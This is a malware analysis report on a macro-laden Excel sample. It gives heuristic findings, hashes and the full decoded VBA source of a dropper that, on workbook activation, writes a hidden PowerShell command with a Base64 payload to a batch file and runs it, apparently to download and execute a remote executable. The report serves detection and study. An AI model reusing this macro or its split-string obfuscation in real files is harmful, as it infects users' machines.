Malware Insights
The sample is an Excel file containing VBA macros. The macro obfuscates its payload by splitting string literals and concatenating them at runtime to reassemble the command 'powershell.exe -win 1 -enc JABQAHIAbwBjAE 4AYQBtAGUAIAA9ACAAIgBOAGgAdQ BlAHkAdgB6AGQA eABtAG8AagBpAG EAeQB5AGkAdQBk AGsAbgBnAG4AeQ AuAGUAeABlACIA OwAoAE4AZQB3 AC0ATwBiAGoAZQBj AHQAIABTAHkAcw B0AGUAbQAuAE4A ZQB0AC4AVwBlAG IAQwBsAGkAZQBu AHQAKQAuAEQAbw B3AG4AbABvAGEA ZABGAGkAbABlAC gAIgBoAHQAdABw ADoALwAvADEAOA AuADEAOQA1AC4 A MQA0ADMALgAxAD gAMwAvADYALwA3 AC8ASQBNAEcAXw AwADYANwA4ADUA NAAxADAAMAAwAD AAMAAxADMALgBl AHgAZQAiACwAIg AkAGUAbgB2ADoA QQBQAFAARABBAF QAQQBcACQAUABy AG8AYwBOAGEAbQ BlACIAKQA7AFMA dABhAHIAdAAtAF AAcgBvAGMAZQBz AHMAIAAoACIAJA BlAG4AdgA6AEEA UABQAEQAQQBUAE EAXAAkAFAAcgBv AGMATgBhAG0AZQ AiACkA'. The -enc argument carries a Base64-encoded PowerShell script which, when decoded, indicates the download and execution of a file from a specific URL. The use of Shell() together with obfuscated PowerShell execution points to downloader or dropper functionality.
Heuristics 3
-
VBA project inside OOXML — medium — 2 related findings — OOXML_VBA: Document contains a VBA project (VBA macros present).
-
Shell() call in VBA — critical — OLE_VBA_SHELL: Shell() call in VBA.
-
Dangerous API name reassembled from split string literals — critical — OLE_VBA_SPLIT_KEYWORD_OBFUSCATION: VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenations is done only to evade keyword scanning.
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 2662 bytes |
SHA-256: 81040dbcb9f2800e697f58bb5d932d7620d70cb03bb03d28433f8eb2b58ad310
Script preview (first 1,000 lines of the extracted script):
' ThisWorkbook document module as decoded by olevba. VB_Name binds it to the
' workbook object, so the Workbook_* procedures below are Excel event handlers.
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Empty event handlers: no behaviour.
Private Sub Workbook_SheetBeforeRightClick(ByVal Sh As Object, ByVal Target As Range, Cancel As Boolean)
End Sub
Private Sub Workbook_SheetCalculate(ByVal Sh As Object)
End Sub
' Payload entry point. Workbook_Activate fires when the workbook is activated
' (including when it is opened), so no user interaction beyond enabling macros
' is needed.
Private Sub Workbook_Activate()
' Suppress all runtime errors: a failed save, file write or Shell() is silent.
On Error Resume Next
Dim i As Double
Dim batch As String
Dim call1 As String   ' declared but never used
Dim s As String
' Build one command line: "start /MIN <System32 path>\powershell.exe -win 1 -enc <Base64>".
' "powershell.exe" is split as "pow" + "ershell.exe", so the name appears in no
' single literal (the OLE_VBA_SPLIT_KEYWORD_OBFUSCATION finding above).
s = s + "start /MIN C:\Windo"
s = s + "ws\System32\" + "WindowsPo" + "werShell\v1.0\pow" + "ershell.exe"
' -win 1 hides the PowerShell window; -enc takes a Base64-encoded command.
' The encoded script is appended in fixed-width chunks below; the report's
' decode above describes it as downloading and executing a remote file.
s = s + " -win 1 -enc"
s = s + " "
s = s + "JABQAHIAbwBjAE"
s = s + "4AYQBtAGUAIAA9"
s = s + "ACAAIgBOAGgAdQ"
s = s + "BlAHkAdgB6AGQA"
s = s + "eABtAG8AagBpAG"
s = s + "EAeQB5AGkAdQBk"
s = s + "AGsAbgBnAG4AeQ"
s = s + "AuAGUAeABlACIA"
s = s + "OwAoAE4AZQB3AC"
s = s + "0ATwBiAGoAZQBj"
s = s + "AHQAIABTAHkAcw"
s = s + "B0AGUAbQAuAE4A"
s = s + "ZQB0AC4AVwBlAG"
s = s + "IAQwBsAGkAZQBu"
s = s + "AHQAKQAuAEQAbw"
s = s + "B3AG4AbABvAGEA"
s = s + "ZABGAGkAbABlAC"
s = s + "gAIgBoAHQAdABw"
s = s + "ADoALwAvADEAOA"
s = s + "AuADEAOQA1AC4A"
s = s + "MQA0ADMALgAxAD"
s = s + "gAMwAvADYALwA3"
s = s + "AC8ASQBNAEcAXw"
s = s + "AwADYANwA4ADUA"
s = s + "NAAxADAAMAAwAD"
s = s + "AAMAAxADMALgBl"
s = s + "AHgAZQAiACwAIg"
s = s + "AkAGUAbgB2ADoA"
s = s + "QQBQAFAARABBAF"
s = s + "QAQQBcACQAUABy"
s = s + "AG8AYwBOAGEAbQ"
s = s + "BlACIAKQA7AFMA"
s = s + "dABhAHIAdAAtAF"
s = s + "AAcgBvAGMAZQBz"
s = s + "AHMAIAAoACIAJA"
s = s + "BlAG4AdgA6AEEA"
s = s + "UABQAEQAQQBUAE"
s = s + "EAXAAkAFAAcgBv"
s = s + "AGMATgBhAG0AZQ"
s = s + "AiACkA"
' Saves the workbook before running the payload; the intent is not evident
' from the source.
ActiveWorkbook.Save
' Stage the command line in a batch file. The path is relative, so it is
' resolved against the process's current directory — confirm where it lands
' on an affected host. Open ... For Output creates or truncates the file.
batch = "Lauzwnihixafsej.bat"
Open batch For Output As #1
Print #1, s
Close #1
' Shell(batch, 0): window style 0 (vbHide) runs the batch with no visible
' window; the return value (task ID) is stored and never used. The VBA never
' invokes powershell.exe directly — it goes through the dropped .bat, so the
' observable chain is Excel -> batch (cmd) -> powershell with -enc. Detection:
' a .bat written by Excel and Excel-descended cmd/powershell with an encoded
' command.
i = Shell(batch, 0)
End Sub
' Empty procedures: no behaviour.
Private Sub Cellss()
End Sub
Private Sub Workbook_SheetSelectionChange(ByVal Sh As Object, ByVal Target As Range)
End Sub
' Sheet1 document module: header attributes only, no procedures in the decoded source.
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Module named "Workbook": header attributes only, no procedures. Its VB_Base
' GUID matches Sheet1's and differs from ThisWorkbook's, so this appears to be
' a second sheet module carrying a workbook-like name rather than a workbook
' module — confirm against the VBA project stream.
Attribute VB_Name = "Workbook"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
| vbaProject_00.bin | vba-project | OOXML VBA project: xl/vbaProject.bin | 6656 bytes |
SHA-256: 908014540259f2e929940a154fc1e18f6e8a756f4af04db55c2bc52014ed41dd